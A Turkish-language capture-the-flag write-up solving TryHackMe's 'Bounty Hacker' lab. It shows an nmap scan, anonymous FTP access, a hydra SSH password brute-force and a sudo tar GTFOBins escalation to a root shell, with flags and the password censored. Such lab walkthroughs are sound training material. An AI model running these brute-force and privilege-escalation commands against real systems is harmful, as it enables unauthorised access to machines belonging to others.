TryHackMe – Bounty Hacker Makine Çözümü

Alper Karaca06 mins

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Bounty Hacker” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

nmap -sS -sV 10.10.192.89                                                                                        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 18:11 +03
Nmap scan report for 10.10.192.89
Host is up (0.062s latency).
Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

2 — “anonymous:anonymous” bilgilerini kullanarak FTP servisine giriş yapıyorum. “passive” yazarak pasif modu kapatıyorum.

> ftp 10.10.192.89                                                                                                 
Connected to 10.10.192.89.
220 (vsFTPd 3.0.3)
Name (10.10.192.89:alper): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||64707|)
^C
receive aborted. Waiting for remote to finish abort.
ftp> ls
229 Entering Extended Passive Mode (|||44602|)
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
226 Directory send OK.
ftp> mget *
^C
receive aborted. Waiting for remote to finish abort.
ftp> get locks.txt
local: locks.txt remote: locks.txt
229 Entering Extended Passive Mode (|||24794|)
^C
receive aborted. Waiting for remote to finish abort.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> mget *

3 — task.txt dosyasını okuduğumda “lin” kullanıcısı tarafından bırakılmış bir not görüyorum. Daha sonra “lin” kullanıcı adını kullanarak “hydra” aracı ile ssh servisine bir saldırı gerçekleştiriyorum.

> cat task.txt                                                                                                     
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin

> hydra -l lin -P locks.txt ssh://10.10.192.89                                                                     
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-05 18:16:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.192.89:22/
[22][ssh] host: 10.10.192.89   login: lin   password: XXXCENSOREDXXX

4 — SSH bağlantısını sağladıktan sonra ilk bayrağımızı elde ediyoruz.

> ssh lin@10.10.192.89
*
*
Last login: Sun Jun  7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
***CENSORED***
lin@bountyhacker:~/Desktop$

5 — “sudo -l” komutunu çalıştırarak sudo yetkisi ile çalıştırabileceğim programları görüyorum. GTFObins sitesinde “tar” programını arayarak sudo yetkisinden yararlanabileceğim komutu yazıyorum.

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

6 — Komutu çalıştırdıktan sonra root kullanıcısına geçtiğim görüyorum. İkinci bayrağı da elde ederek odayı tamamlıyorum.

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
# ls /root       
root.txt
# cat /root/root.txt
***CENSORED***
#

Related News